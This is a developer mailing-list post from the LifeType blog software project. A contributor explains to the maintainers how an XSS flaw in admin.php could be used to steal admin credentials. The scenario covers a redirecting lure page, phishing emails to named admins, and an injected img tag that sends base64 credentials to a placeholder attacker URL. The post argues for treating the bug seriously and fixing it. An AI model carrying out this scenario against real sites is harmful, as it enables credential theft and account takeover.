[pLog-svn] Lifetype 1.2.8 ...

Matt Wood matt at woodzy.com
Mon May 5 10:44:53 EDT 2008 

Here is a common exploitation scenario for you...

An Attacker is targeting the lifetype.net site, he wants admin.

He knows from emails and reading around that Oscar, Reto, Mark and Jon are
likely to have admin on that page, so he makes a webpage on geocities or
google or something.

On this webpage he has javascript (or a meta refresh tag or an HTTP 302)
that immediately redirects you to lifetype.net/admin.php with some
javascript payload utilitizing the XSS exploit.

This javascript payload can utilize XSS to create an img tag, this img tag
has a src of http://attackpage/record.php?data=admincredentials-base64ed(orsomething)
as long as the data fits in the get parameters. You could also
create a form and have no limit.

Now all the attacker has to do is email each of you telling you that he has
found a serious bug in lifetype, and he has screenshots on this page
http://google/blah.(html|php|jpg) (depending on his level of control of the
site). Maybe he even puts screen shots on there so it doesn't look too
scary... and uses an iframe to do the actual attack. You would never know
unless you are monitoring all your traffic through a proxy.

XSS is ALWAYS serious.

On Mon, May 5, 2008 at 1:00 AM, Mark Wu <markplace at gmail.com> wrote:

> >       Can you post an example?  I am still not getting how
> > the server-side is involved. I understand that if I put
> > javascript on the admin's site, the javascript would have
> > access to stuff, but the browser is supposed to block
> > javascript from grabbing stuff from one site and posting it
> > to another, right?  So, somehow he grabs stuff via
> > javascript, posts it to admin.php which then posts stuff to
> > another site?
>
> I have  no idea either. Reto, if you can provide an example here, that
> willl
> very helpful.
>
> >       Sure, that's fine, but as far as I can tell, all inputs
> > would be susceptible to the same problem, so fixing one
> > variable isn't really a fix.
>
> Not "all" inputs, just those inputs that we use string validator and does
> not filtered by htmlfilter( strip tags) or displayed without escape html
> special characters ...
>
> I think quite few ..
>
> Mark
>
> _______________________________________________
> pLog-svn mailing list
> pLog-svn at devel.lifetype.net
> http://limedaley.com/mailman/listinfo/plog-svn
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://limedaley.com/pipermail/plog-svn/attachments/20080505/756d6d39/attachment.htm>

More information about the pLog-svn mailing list